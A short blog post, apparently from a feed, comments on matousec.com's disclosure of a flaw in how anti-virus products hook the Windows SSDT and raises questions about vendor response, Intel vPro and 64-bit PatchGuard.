<div xmlns="http://www.w3.org/1999/xhtml"><p>Researchers at matousec.com, a security research and consulting group, released a <a href="http://www.matousec.com/info/articles/khobe-8.0-earthquake-for-windows-desktop-security-software.php" target="_blank">paper </a>describing a vulnerability in the way anti-virus vendors integrate their products with Windows, namely by hooking the System Service Descriptor Table (SSDT). They also built code that exploits this vulnerability and bypasses those anti-virus programs. The Register has a good <a href="http://www.theregister.co.uk/2010/05/07/argument_switch_av_bypass/" target="_blank">summary</a>.</p><p>My first reaction is "so what?" Anti-virus programs have become almost irrelevant as the primary attack vector has shifted to browser-based applications. On the other hand, this vulnerability could lead to a resurgence of more direct viruses. </p><p>Second, how and how quickly will Microsoft and the anti-virus vendors react? </p><p>Third, what are the implications for Intel's <a href="http://www.intel.com/technology/vpro/index.htm" target="_blank">vPro </a>technology?</p><p>Fourth, is there an anti-virus vendor out there that does not use SSDT to integrate with Windows? Note that on 64-bit Windows, Kernel Patch Protection (PatchGuard) already forbids modifying the SSDT, so vendors' 64-bit drivers have to use other integration points in any case.</p></div>
</content>



    </entry>
 
</feed><!-- ph=1 -->

